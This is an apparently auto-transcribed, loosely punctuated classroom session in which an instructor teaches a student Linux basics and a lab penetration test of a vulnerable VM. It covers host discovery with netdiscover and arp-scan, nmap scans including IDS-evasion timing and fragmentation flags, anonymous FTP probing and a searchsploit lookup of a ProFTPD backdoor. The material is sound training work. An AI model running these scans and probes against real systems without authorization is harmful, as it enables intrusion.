When you type host name, it's going to tell you the after the Adam --> insignia which is the name of the computer which is your operating system there you go fantastic --> okay and i'm actually looking at this list so now we're going to maneuver i would like for you to --> take type in cd which is change directory space dot dot press enter now type pwd you just at the --> top when you type pwd you are in slash home slash student you understand now you went back up you --> went up a directory from cd space dot dot to the home directory okay now pwd is one way to check --> but if you type the words ls and enter it will show you the different directories that are actually --> there now i would like for you to and listen to what i say change directory to student all right --> type pwd yay type list press enter yay that's what's inside student all right very similar to --> windows the only thing is when you do cd dot dot you do cd dot dot in windows and linux you do cd --> space dot dot that's just one way there's a whole bunch of ways now i'd like for you to cd space dot --> dot enter type cd space dot dot again enter you went all the way up to the root directory now --> type ls type pwd do you see where you are that forward slash dictates the tip top of the you're --> a ceo of now the company and everyone underneath you is apps boots xc etc etc the home directory --> i would like for you to change directory now all of these directories have meaning --> that's a google search we don't really have a whole lot of time to go through all that --> but these you need to know how to maneuver to these directories so i would like for you to go --> to the home directory. Don't type CD though. Just type the word home. Enter. That's another way to --> do it. Change directory does work, but I'm trying to show you multiple ways to do it. All right. --> Type list, LS. Okay. I want you to make a directory. Do you know how to do that? 
--> um i've made them before yes mkdir mkdir space and put donna enter --> uh-oh permission denied when that happens i want you to hit the up arrow --> control a whoops --> type sudo press enter type list and overcome your problem --> if you copy and paste this in the chat gpt if you do a search why didn't mkdr work it says --> can i create directory permission denied because you don't have enough administrative privileges --> right right so since you already created donna you don't need to do it again because it says --> the file exists yeah okay that's good though we i love it when you make mistakes or people --> make mistakes because then we go oh okay i know not to do that again we learn a lesson --> How do I un-make a mistake in this process, in this language? --> How do I un-make a mistake? --> You don't exactly un-make a mistake. --> You just learn from it. --> Learn what not to do. --> If it's something that's running, then maybe you want to stop it. --> But I'll show you that because we're going to do that in a minute. --> Okay. --> Let's see here. --> Customize the word panel. --> So normally when I do pen testing, I like to make directories for what I'm going to do. --> So now I want you to remove the directory that you just made type RMDIR, RM, not E, not RM. --> Yeah, RM. --> I gotcha, I gotcha. --> And remove Donna. --> Type LSD, uh-oh, uh-oh, same reason. --> What do we do? --> How do we fix it? --> Change directory. --> How do we, look at what it says. --> We read the output all the time, right? 
--> fail to remove so we have to do r m d i r again nope backspace you didn't read the whole thing --> to me i was waiting for you to get those last two words to remove donna permission denied so i have --> to do control a pseudo r m d i r and then rewrite my name do or you can hit the up arrow --> and do the same thing but yes control a control a pseudo enter now let's check it yay now go back --> into student change directory back in the student okay now now i want you to create a directory --> i want you to make a directory and call it basic pen testing put a underscore okay never mind that's --> fine too if you wanted to make um uh two words you would have to put an underscore between the --> word basic just throwing that out there press enter do a list there it is right there see --> basic pen testing now let's change directory to basic pen testing okay stop right there don't type --> anymore press the tab key yay press enter autofill wonderful dragon can now i want you to now open up --> your virtual box you may have to click on the dragon at the top left yeah right by the way --> there's 600 plus different tools you see it reconnaissance all the way down the surfaces --> and other tools type in virtual box go ahead and click on it --> you got your virtual box inside of the linux terminal isn't that cool --> yes now in the real world you're going to use a um a vpn to make sure people don't know who you --> are when you're hacking into a system legally because we don't do that illegally orange jumpsuit --> right ask what vpn you guys use because i think there are a lot of them are garbage so you you --> with a lot of things they don't what what should i use it's really up to you that's a personal --> question that's almost like what shirt should i wear today which shoes should i wear but the --> government will do research and they'll they'll have recommended ones that they use the pen testers --> will do research they may use something totally different in 
the end of the day though a government --> agency is still probably going to want to whitelist your ip so that you can actually --> have permission to do the work the um government pen tests um are very much controlled they want to --> know everything you're doing so there's no getting around it but you still want --> to whitelist a IP via your VPN maybe a different country or a country in the --> US but it's not actually your house you understand yes because we can reverse --> IP all kinds of stuff now we do you know you already know how to install stuff --> i'm not worried csec is actually basic pen testing one right so i'd like for you --> uh-oh it says can't all right just go ahead and close that can't enumerate i just powered it up --> no no no no no no that little orange on the right the little orange auto capture --> keyboard yeah go ahead and click x on the far right no no no no no no no cancel cancel hit cancel --> yeah well okay yeah yeah yeah knowing yeah click that X before up every time --> you see it just get rid of it they do now go ahead and click that same thing --> and it's taking its time so let's wait it out in summary what's happening now --> is you're opening up a pen test a vulnerable pen testing machine and it --> It looks like it's Marlin Spikes machine. --> Got it. So the scenario is this. --> Donna, you've been hired to conduct a penetration test of a specific IP address, a specific computer, right? --> You are going to be like, OK, what are the rules of engagement? --> What is the scope of this pen test? You're going to be writing it all down, right? You're going to present your legal certifications, your authority, your company, your NDA, all of your attorney's documents. You all are going to be talking. This is business, right? 
--> you are going to um document the ip address you're going to find out is this more of something --> we work together like a white box type pen test or is it something with black box where i'm just --> going to do whatever and get in any way i i can since this is one ip address it's going to be more --> white so you're going to kind of work together um or you may work individually in the room and --> if you need me, just come get me. If you see something that is a different IP address, --> well, that's like, instead of walking to my house, then you walk into my neighbor's house. --> That's a problem. So you want to report that, hey, there's another IP address here. --> It's not within my written scope. You understand? Yes. Fantastic. Because you're a consultant. --> You're a cybersecurity professional. --> You're not there to break into their systems. --> You're there just to test their security and make recommendations. --> It will be in the form of a report. --> You need total documentation. --> And you have lots of documents. --> You got Adratus. --> You got Cherry Tree. --> You have OneNote. --> You have all these different documents where you can document this stuff. --> Okay. --> You want to make sure you have insurance. 
--> because um you make a mistake they they don't care how much money you have don't have they just --> want theirs right end of the day we want to make sure that they don't prosecute you and we want to --> show them and give them uh well researched and experienced recommendations that are not just --> google and chat gpt based you need to go over you okay go ahead ask the question how much liability --> insurance are you indicating that what is normal that's consult that's an attorney question and --> and it could be very simple just saying you know you make mistakes yeah okay i understand --> now let's just say you have written permission you have all that stuff covered all the business --> stuff is covered you are in the mix you are now here you're going to conduct the pen test --> okay marlin spike you the machine is running meaning that they just put you on the network --> now i need you to minimize that machine because it's running --> uh-huh you look top right two clicks over from the blue x don't click the blue x two clicks to the --> left go to the left two times two bullets two circles nothing there go don't log out --> okay --> go ahead --> where is it --> I'm going to tell you --> I got you --> you see the blue X right --> go two buttons to the left --> there you go --> done --> that's minimized right --> now if you were doing this --> in Kali Linux there's a whole process --> for this doing a break or something --> or when we come back --> sometime this afternoon I'll show you how --> to do it inside of the virtual box right I do it all the time now you can minimize your virtual --> machine same way that no no no go back see the blue X go to the left go you know go to the top --> and click on the virtual machine I want you to see you see the blue X on the top I can't see --> that though? Can you see where I just can't see it? No idea. What's in the way? Nevermind. I just --> moved it with my finger. That'll never happen again. That's good. 
These are called lessons --> learned. You're learning tons of lessons. Now I would like for you to, okay, we're thinking, right? --> we are actually on the the network of that company okay i need you to type ip space a --> on the on the terminal press enter okay now ipa is short for ip address --> as a matter of fact type ip space address see what is your ip address of this um linux computer --> do you know the IP address is one zero point one zero zero point zero point four --> it's actually going to be number two which has ETH zero the ethel that is ten point zero point --> three point one five yes ten does it I feel that fifteen right so I always look at the ethel ethel --> zero right right that's usually what it is first and of course the loop back address is the one at --> the top. 127.0.0.1, that's used for testing and it's not given out. And you have another --> interface called Edge Zero, right? But we're not worried about that. What we need to find out, --> though, is the IP address of Marlin Spike. They didn't give it to you. They just gave you a name --> and said, okay, you're a pen tester. How can you find it? What would you do? --> First of all, you will have already gone through this. You would have done, you go to the research --> and say how to find IP address of target machine in Kali Linux, right? Don't do it now. I'm going --> to fast track you through it and then you're going to do it for the rest of your life. 
So I'm --> to show you two commands one is you're going to type sudo super user do space net discover --> all one word press enter all right it is currently running an address resolution protocol request --> looking for an ip address it's going to show you the mac address the count the length the mac --> vendor or the host name it says 10.0.3.1 okay and it's going to take a sweet time running through --> this thing so what i want you to do is to right click in the terminal and i want you to split --> view left and right now each of these terminals run independent i'm going to give you another command --> it's as a matter of fact click on the left left terminal type control shift plus plus plus make --> it bigger just click inside the box control shift plus plus plus control shift plus plus plus on the --> keyboard not typing anything left click inside the box left click not right click left click --> left click now do it now control shift plus plus plus don't do anything else look like you're --> trying to do something there you go you're getting it there you go now i can see it --> on the right side do the same thing click in it and control shift plus plus plus there you go --> that's how you make it larger for your audience to see it you may be working with other pen testers --> hey this is what i did this is what i found out right you may be a excellent at reconnaissance --> or information gathering someone else on your team may be excellent at numeration or vulnerability --> scanning etc etc you see how that works yeah now here's a clue do you see that mac address --> that starts with 0800 i do good now i need you to go back to your click on your virtual box --> and now i need you to write click on settings because it's already highlighted blue --> go to network okay do you see where it says mac address 0800 blah blah blah --> yes does that mac address match the mac address on the left over there it does hey you just found --> the ip address of your target 
machine cool okay this is how that go ahead and click on okay --> and then minimize the virtual box now on the right side i'm going to show you another command --> now remember in your notes this is how do i find the ip address in the government or most --> organizations they're probably going to give you the ip address because they don't want you --> slipping around their whole network but if they don't um um these are some strategies to find it --> now i want you to type sudo space a r p all right press ctrl e hit the backspace --> press ctrl e press enter yes now this is the art skin hey doc control e what does that do for me --> okay what did that just do it so we we did it earlier we're going to do it again right this --> second because you're going to learn type in um type the word history press ctrl a uh-oh --> type the up arrow type ctrl a i have to type it or you're saying hit it hit control button --> and the letter a what happened with the cursor oh it brings it back to the beginning press ctrl --> in the letter e what did it do now there you go yeah fantastic so now hit the up arrow twice --> one yeah press enter go back down okay hit the up arrow until you get the pseudo art scan --> press enter fantastic now tomorrow you're going to be putting all this stuff in the notes because --> we got to write a report so guess what we did now just so you know on the left side --> the net discover is still running can you see that yes on the right side is done can you see that --> yes which one is faster the right side which one is more thorough the right side --> well they look about the same except the left side is still running right --> left side's more thorough because it's still running and it's yeah there you go you got the --> answers now so we want to be as thorough as we can but if we can also identify the target that we're --> looking for and you've verified it because you know what the mac address is inside virtual box --> you just didn't know the ip 
address now you know the the ip address of marlin spikes machine --> You got it? --> Yep. --> You will have to know these commands. --> These commands, if you're writing up notes, and I'll show you mine later, --> is how do I find the IP address from my, you're the attack machine, --> Marlin Spike is the target machine, and you're going to type --> sudo net discover or sudo arp scan, arp dash scan space dash L. --> You don't have to do both of them, but that also depends. --> Now, here's the thing. --> Underneath that, I want you to type man. --> Just backspace twice. --> Type man space ARP dash scan. --> Don't forget the dash. --> Okay, it came up. --> Okay. --> Do you know what ARP means? --> I did. --> Address, resolution, there you go. --> Send ARP request to target host, which is what you did, and display the responses. --> And then you have the synopsis. --> It says ARP-scan, options, and host. --> That's exactly what we did, minus the IP address for the host. --> We just put the dash L. --> If you scroll down, pardon me, it will show you what the dash L means, right? --> Eventually, press Q. --> You don't have to worry about it now. --> What's the other command I showed you? --> The other command. --> TLDR space ARP dash scan. --> Scan the current local network. --> That's what dash L means, local net. 
--> scan an ip network with a custom bit mask it shows you that etc --> so now when we're conducting this net discover and this address resolution scan --> we are um information gathering well we've transitioned from um passive to active --> yes sir if we were doing this passively we'd be on facebook google dorts and looking up the url --> looking up the company name and trying to find out stuff with random google searches you understand --> okay um once you start getting active that's when the orange jumpsuit is being sized for you --> yes that's why we have to have written permission to do these things now we know the ip address --> and we can be verified it with two different tools when i took the cpin course it said --> you don't have to know a hundred different tools to do this you just need to be really --> proficient at with at least two or three of them for each section pen testing is pen testing --> you have people who are mega mega advanced in pen testing they can write their own scripts --> and one day we will get there but in the meantime we're just going to do basic pen tests to --> understand what we are doing what are your favorite tools i have way too many i have so many notes it's --> not even funny i have eight years worth of notes but arp scan and net discover are givens in this --> community for information gathering when you're doing passive stuff okay okay now on the left side --> we want to stop that do you know how stop that command from running because it's running you --> see it changing yes um just a q go ahead and type q and see what it does nada well it looks --> it stopped it to me you can also press ctrl c all right so we stopped that fantastic now we're doing --> a basic pen testing we know the ip address let's verify we've already verified that we have --> connectivity but this is something that you may have to do in the future so i'm gonna show you --> right now what command do we type to verify connectivity from the attack machine 
to the target --> machine ping it go ahead ping it it's the tab make sure you type the uh ip right because that --> wasn't it ah so now this is this is what i do to myself so how do i back out so how do you stop --> it we just talked about it you control c there you go that's your answer hit no no hit the up --> arrow just change the zero to a three backspace keep backspacing change that three and the three --> got 16 oh yeah I see hello oh three put that back because it's not lit you see --> how it's not lit it's grade it's because you put the period three that there you --> go one six press enter okay lesson for you oh I wrote the wrong idea originally --> yes okay i got you i got you sorry but what do you what do you see happening right now --> sending pings um you essentially created a ping flood right to the icmp right but that's what a --> pink flood is right well how do you stop it you how do i stop it q control c q did that work before --> yes uh q did not work before ctrl c worked there you go so think ctrl c q doesn't always work --> and with some other ones it's going to be colon wq it's going to be the escape button --> so we have to learn which if there's a lot of different ways to stop it and if you get stuck --> you will google search it or research it how do i stop this command from running --> or you'll take a screenshot put it there how do i stop this in linux it'll tell you okay --> now that ping means that we have connectivity you have zero percent loss and 45 or receive --> you can hit the up arrow put a space dash c space --> uh-oh oh i didn't mean to do that hit the up arrow up space put put the number eight --> press enter one two three four five six seven eight nice you can also establish a count --> now if you man ping this all those are written in the instructions --> our issue is we fly through stuff fast we can't do that we have to take our time --> okay i understand gotta read the output why do you want to give it a ping count you just 
don't --> want to be because if you don't you don't want it correct because if you don't is it'll run forever --> yes so if someone has done this for the very first time they're like it's pinging now what --> it's still pinging and then uh an ignorant person would sit there and let them go like this --> and they'll just giggle at them right the thing is we are trying to i'm trying to make sure you --> understand not just oh that worked but when it doesn't work what do i do you understand yes --> now I want you to hit the up arrow twice three times there you go press --> ctrl a type the letter F press enter oh oh you press something else press in --> yeah look at what it said it's alive right f ping if you go on the right side --> and man f ping right side right terminal man f ping i could never mind i got it --> send icmp echo request package to network host it's just another command right yes go ahead and --> press q and now you don't have to worry about the ping flood did you see that yes if you f paint --> now if it wasn't up it'll say down or dead sometimes they'll say it's alive or it's up --> okay look at all this stuff that we need to screenshot and put inside of our report and if --> we were writing our report in tandem we could be doing that it's fantastic which we're going to do --> later today or tomorrow right now we're going to get through this pen test and i want you to --> understand the analogy you ask questions as you are doing on the left side the left terminal okay --> imagine now i'm at your house you're at the front door and you gave me authorization to conduct --> a test of your security defenses of your home as soon as you wrote the documentation --> and you signed it you know what i'm gonna say close your door and go back inside and sit down --> and live your life you know what i'm going to do i'm going to walk around your house --> for as many days and hours or weeks that i can what am i looking for when i'm walking around your --> house 
okay i'll go with cracks which is a synonym to weaknesses which is a synonym to --> to vulnerabilities. Fantastic. Well, walking around your house physically, if I saw a window --> crack like this, and I said nothing to you, at a time of my choosing, that may be my vector, --> my opening into your, my attack vector into your house. You understand that? And then you would --> feel terrible. What do you mean I had a crack in the door? Now, pen testers are not allowed to --> break stuff, right? We should not break stuff. A really good ethical hacker, a crack through the --> door or the little window, that's not breaking. If I physically broke it, I had to pay for it. --> I'm in trouble, but I'm just trying to get inside the house unscathed without you seeing it. --> If I also notice that that crack was on the second floor window of your home, say you're in a house, but there was a basement door crack like this, which one do I want to go in? --> Both. --> I want to go in both, but which one will I more likely go into? --> Well, basement because it's more. --> Because I'm not Spider-Man. --> Right? --> I can hurt myself. --> I can get caught. --> I could be seen. Neighbors may see me climbing to open up a window in Clural Inn. That's no bueno, --> right? But if I can go at the right time of day, two o'clock in the morning, and I can slip in --> through the door, I know you have no dogs, right? I'm doing reconnaissance of your house --> without you knowing. I'm watching. She doesn't have any dogs. She lives alone, or maybe she has a --> a significant other and some children. Whatever the case is, I saw all the lights go out at like --> 11 o'clock every night. I'll watch you for a few days. I'm trying to think, and I'll make the team. --> Hey, team, this is what I've seen. You see my notes? What do you think the best time? Then --> she wakes up at this time. I didn't see any lights come on between 11 and 5 a.m., so she's probably --> in a deep sleep. 
You understand what I'm saying? You're putting a lot of thought in. How am I --> going to attack successfully this person? I get inside your house. I get on your computer. I got --> everything I need. I got your money. I got everything I need. If I'm looking for something --> else, I want a stolen artifact. I got everything I need. Your job is to always protect all of your --> gold, your intellectual property, whatever that is, your money, your information on your computer, --> your intellectual property, KFC's secret recipe, --> your social security number, your private pictures. You want to keep --> people out physically, logically, and that's going to --> constitute policies, some --> digital strongholds, maybe even --> physical strongholds. Did I say too much? --> No. Also, you need to monitor --> everything, physical and logical. What do we do to monitor our physical? We lock out doors. --> We have alarm systems. Maybe we have cameras, motion detectives. And hopefully they give us --> an indication that in real time that something's happening and we go execute our protections. --> What do we have in our homes logically? --> So ironically, as I show people how to build socks in their houses. --> I have a sock in my house. --> A router. --> Well, the router is going to allow me to network with you and other people in the world. --> I'm talking about security operations. --> I'll show you an image later. --> A sock. --> Okay. --> Being able to monitor your home. --> If someone broke into your digital space right now, what do you have to detect them? --> There you go. --> Just a few bells and whistles, not much. --> Right. --> Most people have nothing. --> And that's what I'm saying. --> That's a few bells and whistles, right? --> Specific is usually equates to nothing. --> Organizations will find a hacker. --> They will watch you, right? --> After a while, they'll try to zero in to find out where you are and they'll attack you. 
--> or they'll send the police after you if they can't then they'll block you --> your job though is to get inside this organization --> and show them all their flaws and make recommendations you understand and that's --> why we're talking about both sides and i'm going to show you an image that'll wrap it all up later --> on so here's the thing you now verify that you have connectivity to the target machine --> Now, I just discussed with you what I would do physically and digitally. I would do some sort of --> even more information gathering and reconnaissance of your home. I'm not just going to walk in --> through your door because I don't know what you may have, a shotgun, a pit bull, some ninjas behind --> the door and i walk in and get my head chopped off right why would i just when you think a special --> forces team they don't go behind enemy line and start stuff they try to be quiet and hush hush --> on it the command i want you to remember now is now it's time to do a network mapping scan --> of the ip address so let's do it um discover no sudo no net discover we did that already --> you're going to just type in map and you're going to in map that ip address --> press ctrl e now press enter thank you got it when you see something pops up then you can press --> ctrl e or you can just type it all in now starting in map version 7.95 the latest version you got --> the date and you got the time the nmap scanner port for that ip address the host is up virtually --> no latency there are 997 closed ports but there looks like there are three open ports --> so when you do an nmap scan of an ip address it shows the first used 1000 ports how you learn --> how to use in map is you google an in map cheat sheet so you can find out more or less information --> so i'll need you to go to firefox oh i have one somewhere i have a physical one can i get it --> yes but i want you to use a digital one purpose because i want to show you some more to add to --> your physical go 
into the firefox and then hit the plus sign or yeah go right there you're fine --> Click on that, type in map cheat sheet, and I specifically want you to use the one from Station X. --> Oh, I love Station X. --> My God. --> No, there we go, Station X. --> Okay, now, I want you to type Control F. --> No, on Station X. --> Just make sure you click on there. --> Type in Control the letter F. --> Where? --> Don't matter. --> Just click there. --> Hit the control button and the letter close that that thing you're all --> Okay, and it came open. I think at the bottom left --> See what says specifies pro roundtrip. I don't know what that is, but a bottom left side left side bottom --> Specify right got it. So I want you to type in --> Time Tima like erase everything there highlight it all control a and press --> press delete type the word time press enter okay that table of contents close that it's in the way --> fantastic okay you type the word time did you see what came up --> no good go in the bottom left hit time again do you see the word time highlight yes right press enter --> again and you see it another time so then we we use this inside the sock to search for stuff --> on a page okay now um that's just an example let's see here um uh hit enter until you get --> the time and perform performance it's gonna be like see how it says nse scripts just scroll all --> the way down it'll be underneath there somewhere use the scroll bar if you have it there you go --> keep going keep going oh look at this right here this is interesting look firewall flash intrusion --> detection system evasion and spoofing you see how it has in map the um ip address in the dash f --> and the description requested scan including ping scans using tiny fragmented ip packets harder --> for packet filters in map is a very loud command you get on anybody's network and you type it --> minus home network and if they monitor the network like a security operation center style --> they're going to see 
you yes so pen testers create their own custom made in map scans to be hidden --> this cheat sheet is showing you some of the ways to hide it in the real world you don't want to get --> caught when you're doing a pen test you don't want to be seen this one cheat sheet has a bunch --> of different examples of how to do that keep scrolling down a little bit more it could be up --> but go down output scroll down helpful keep going i'm looking for a specific section i think it's --> near the top yeah scroll to the top it's like time and performance or something like that --> keep going keep going you you're going good with that speed before right there right there --> there you go look at how it says if you use the dash capital t and the number zero --> what does the description say and map the ip number paranoid intrusion detection system --> invasion yeah and the t1 is sneaky t2 is polite right then we got normal aggressive and insane --> nmap is insane on itself but if you put a dash t5 oh man you just begging to be caught --> you put the dash t0 you're like this i just don't want to get caught but keep this in mind --> it may take you five weeks before you get an answer if you don't have a super duper machine --> it may take forever you understand whereas for these vulnerable machines you can use the dash --> t5 and look at how it's written in the map the ip address space dash t5 right scroll scroll up a --> little bit more os detection so remote os detection is the attack capital o and fingerprinting right --> go up a little bit more you have the dash capital a scroll down one more the next section service --> and version detection enables os detection version detection script scanning and trace route --> so let's click on the terminal on the left hit the up arrow on the left one time --> put in a space tack capital a don't forget that oh tack means dash that's how we talk in cyber --> that's okay press enter now let's compare from the first in map scan to the 
second one notice --> how this one's taken a little bit look at all that information it gave you does that make your head --> hurt or what not yet good well Donna you are pen testing you are conducting vulnerability analysis --> of an IP address to see what's there to decide which one of these things I'm --> going to exploit which little window crack am I going to open am I going to --> do the second floor or the first one well there's more on the second floor than --> the first yes but getting up there is how do I get there and not be seen all --> these factors we call it common sense but it also to not everyone since it's --> common these are things that we need to know is first of all we don't want to get caught just don't --> secondly um how do i do this and get my information fast enough a lot of people in the pen test world --> like to in map and scan all 100 a whole 65 000 ports right let me show you that lesson now --> why would you want to do that though that's just way too many because because they don't know --> because all they want to do is find a flag i care less about a flag i'm talking about protecting --> your social security number and everyone else is on that home network your intellectual property --> and so forth that's what a flag represents in these boner hogs as long as you know that you're --> good hit the up arrow again hit a space dash p dash don't forget the dash dash p dash oh hold --> it dash p dash now hit enter again guess what you just added a new switch to the nmap the network --> mapping command and it's going to do an even more intrusive scan go back to the cheat sheet on your --> firefox go back to that cheat sheet in the firefox now i want you to do ctrl f and type dash p dash --> just go to the bottom left where it says time go back to firefox we were talking about firefox --> now oh i'm okay see where it says there you go type dash p dash there you go what are you doing --> scanning ports how many ports 65 000 or the ones 
that you picked to scan --> you can decide now now read the description what does it say uh specific target specific ports --> ranges or combinations of tcp and udp ports you're reading too much you have dash p dash --> highlighted in green right yes i do read that it scans all ports there you go oh all ports is what i --> want you to know so now we go back to the left just click in the box there you go starting in --> map 7.995 we scan a report for the ip virtually no latency not shown what's that number 65532 --> you see that sure no okay go to the top of the in map scan in map 10.0 that 3.16 a dash p dash p --> yeah no i'm there okay put your cursor there and show me that you're there --> yeah now now go to the not shown there you go highlight the 655 532 oh i'm with you right --> the reason why you see that is because you put in the dash p dash --> yes because when you go go above it and look at the one above it post it up --> no no no scroll to the in map scan above it scroll up oh --> they go right there when you don't when you just put the dash oh you went too far --> go a little bit just a little bit go up a little bit just use the scroll bar --> there you go right there you see the in map scan you did before the um --> no i'm sorry you went down scroll up to the command you did before scroll don't don't type --> it in again just roll roll scroll the scroll let me go no just use the um no no no no you're you're --> typing the command so use the mouse and scroll to the command before the output before right here --> yeah i want you to show me the one before that scroll up go up use the cursor stuff whatever --> you've got to do to go up just click above left click right there do you have one of these on --> your mouse this thing right here i don't have a mouse okay can you swipe down a little bit or --> just so that you can see the command before it you just did it a second ago get the scroll bar --> it's like i'm so stuck use the scroll bar on the right use 
that scroll bar right there to the right --> right right there go up a little bit just go up a little bit there you go keep going keep going --> keep going keep going okay keep going keep going till you get to the command you type --> right there oh okay scroll down a little bit because i see the in map dash a i'm trying to --> get you to show that okay now scroll up again and just go slow until you get there --> no grab the um the bar like you did before you know what's happening is that my scroll --> it keeps getting hung up it will not scroll me all right so i'll go back down right there --> right there that's it that's it that's it that's it that's all i want you to do you just did it --> and it says um what am i looking for okay here's the question how many ports did both of those --> in map scans um how many ports did they scan well one of them was a thousand no 997 closed --> and three open no no no no no no add 997 plus three there you go that's the answer how many --> okay so let me say it again i want you to talk with confidence --> how many how many ports were scanned with both of those in map scans with both of them all the --> ports how about this in map 10.0.3.16 how many ports were scanned one thousand fantastic that's --> a great answer how many ports were open three how many points were closed 997. that's what --> So here's what. Those are test questions. If you decide to sit for a certification, --> those are test questions. I just wasn't. Yes, I understand. --> Now we did the dash capital A and we see what are the names of the three ports that are open? --> 21, 22, and 80. And what is port 21? 21 is the TCP port. --> What does it say there for service? --> FTP. --> FTP. --> Which means what? --> FTP is... --> Go ahead and Google it if you don't know it. --> Yeah, I'm going to Google it. --> There you go. --> The protocol is file... --> Oh, I know this. --> See, that's the thing. --> I know this. --> It's just that file transfer protocol, port 21. 
--> Okay, good. --> So what does that infer? --> or what does that mean file transfer protocol what are you thinking it's the network file service --> which means what layman's terms how the network transfers files to the users which means that --> if i knew how ftp works i could potentially transfer files to or from the target machine --> you understand that that's how we dissect this when we see open ports right whereas if i walk --> around your house if i see that window cracked on the basement floor or the second floor i could --> potentially open the window and climb in or take stuff out you understand yes what is port 22 --> 422 is tcp ssh ssh which is soft shell which is a secure network which is secure secure shell --> right secure shell i mean secure shell yes right now so you can go ahead encrypt your message here --> which means that do you know how to use secure shell or ftp i've used that a lot in labs but i --> i mean do you remember what commands you type do i remember the commands you type you can say no --> i don't care no i don't know okay here it is it'll probably come back to me so here's the cool thing --> all you need is a username the service ftp or secure shell a password and then you can now --> send information back and forth or retrieve information do you understand that's how i --> will gain access to your intellectual property you understand now the last port port 80 what does that --> mean is the http port which means what http means just the the web pages you're pulling up no no --> H means this. T means that. T. Yes, yes, yes, it is. Hypertext transfer protocol. I knew you knew it. I did know that. I mean, I know them all. It's just that my, I don't know. It's just that my brain feels that this is new and it's not new. It's just that it's a new platform. 
--> so i get all i breathe like my brain pretends like it doesn't know that i know all this it's --> just not clicking on full cylinder and that's why we're taking our time so http hypertext transfer --> protocol and we see that's an apache 2.4.18 version right it says site doesn't have a title --> right they got the server header it's an ubuntu server wow we have all kinds of information that --> we gathered with that dash capital a we can see the difference between when we first did the um --> the first command which only gave us a few lines we did a dash capital a it gave us a lot more --> information right and we have to read every last line and then the bottom one with the tag the deck --> the tag the tack p dash is searched all 65 536 ports by the way the top port number is 65 535 --> the bottom port number is zero that's what makes 65 536 ports you understand because computer starts --> with zero we humanoid starts with one we know zero is a uh uh nothing now i need you to scroll --> to the bottom on the left oh god the scroll yeah let's go down good so the the key here is when it --> highlights blue you're on top of it now i want you to hit the up oh i wanted you to hit the up arrow --> once i don't know what's going on here hit the upper one oh you gotta scroll down you way up --> there press the down arrow and go all the way down you're going down or up i'm down uh you can't be --> you can't don't hit the oh yeah hit the up arrow one time there you go stop okay space --> there's two ways to do this i want to show you the fast way the the greater than sign so shift --> and period space and i want you to type um basic pen testing in map scan dot txt that's a lot --> or you can put bp bp nmap scan dot txt yes or no all one word bp nmap scan dot txt all one word --> dot but don't forget the dot you need that dot that's the extension dot txt got it yes sir --> press enter it's it's thinking it's waiting it's doing it's making us wait what happened --> Okay, 
good. Now I want you to list everything that's there. Type ls and enter. Do you see --> that right there? Go ahead and open it. Do you know how to open it? Type cat for concatenate --> space type the letter b in the tab key press enter there you go you created a text file --> with all that stuff so now you can use that later for your documentation --> okay concat is concatenate which is how you open up a file from the terminal bad guys like to work --> in the terminal they more hidden that way so now we got that preserved you can do that for anything --> by the way yeah and i think the actual on that cheat sheet i think it shows you how to create --> a file i think it's the tack o capital n command that shows you how to do that you now have this --> data you take this data and you come back to the lab either by yourself or with the team and say --> hmm i need to learn how ftp works i need to learn how ssh works i need to learn how port 80 works --> Wait a minute. Port 80. Isn't that just the browser? Isn't that just the browser? --> Isn't it what just the browser? Port 80? --> Port 80. --> No. --> Yes, it is. --> Go to Firefox. --> Go to Firefox. --> Okay, open up a new tab and type in 10.0.3.16. --> Press enter. --> Okay, type it in the URL at the top. --> Look at the message. It works. 
--> it says this is the default page for the server that is not a good thing we should never be able --> to access a server but as a pen test you like this oh there's something going on here the web server --> software is running but no content has been added yet hmm what are some things we can do way too --> many one is right click that page click on view page source man okay all right i don't see anything --> here that's making me jump so i'll i can now close that you will you will look to the right --> is there something in the way yeah i got it okay now this is all stuff you should be documenting --> inside of your report right you're showing them like look should i be on your default web page --> for your server and they're going to buy this oh no no that's no bueno right --> what you can do now is you can check this for vulnerabilities --> but to fast track you through this particular pen test report we did the in map scan because bad --> guys don't have to physically do the tom cruise and the mission impossible and come in physically --> and go into your space they'll just try to hack into a server somewhere yeah web application --> pentest right there's just one version of pentesting there's so many different mobile all --> that stuff now you see that you're there's a default web page in the server what do you need --> now in a perfect where if there's some way you can find a username and a password you could probably --> get into that server and there's a clue since there's an ftp a file transfer um protocol there's --> probably a file over there i need to get it and then ssh if i can secure shell into it i could get --> all its secrets are you understanding yes so the game plan is all right team i went to port 80 --> i see that there's a ubuntu server there we have ftp we got ssh ssh is stronger --> let's see if we can ftp into that ip and let's see what comes up so now on your terminal --> the bottom you're going to type ftp space the ip address 
10.0.3.16 --> and whoa connected pro tp whoa pro ftp and that was up there in the nmap scan too --> so you know what you should do on the right terminal we're going to type the word search --> exploit one word yes all one word space type in capital p pro ftpd capital p you're going to write --> write that word pro ftp d d d oh t pd space 1.3.3 c low kc let's oh press enter oh snap --> what did i just do what did you just do there are some there are some vulnerabilities there --> there. And NMAP told you that there are vulnerabilities there. There is a compromised --> backdoor store. You also did that FTP on the left. Now, that means that you would have to go --> to Geeks for Geeks to find examples of FTP. But where it says student, type the word anonymous on --> the left real quick a-n-n-o-n-y-m-o-u-s press enter it says anonymous login okay send your --> complete email address as your password just press enter on the left login failed 530 login incorrect --> guess what every time you get a failure every time you get an in map with some stuff you should --> be searching it. It just goes with the territory. You can't act like, oh, I know what that is. --> Well, this is just a game. You literally do everything and document it. But it says FTP --> on the left. Well, hmm. Type in, who am I on the left? Invalid. Okay. Well, what else can we do? --> type in ls please log in with user and pass can't find bind or think you're already in use --> okay well we're getting close there's something there type in ls space dash al --> press enter please log in with user and pass okay type exit we've already expended our --> press the up arrow press enter type anonymous spell it right a n-o-n --> y-m-o-u-s press enter press enter type in um ls space tag al enter --> okay we're gonna have to figure that out that's okay though hold on one --> Segundo. Let's go here. --> Basic. --> All right, then. --> The SV gives you some good stuff, too. --> SV. What are you looking at? 
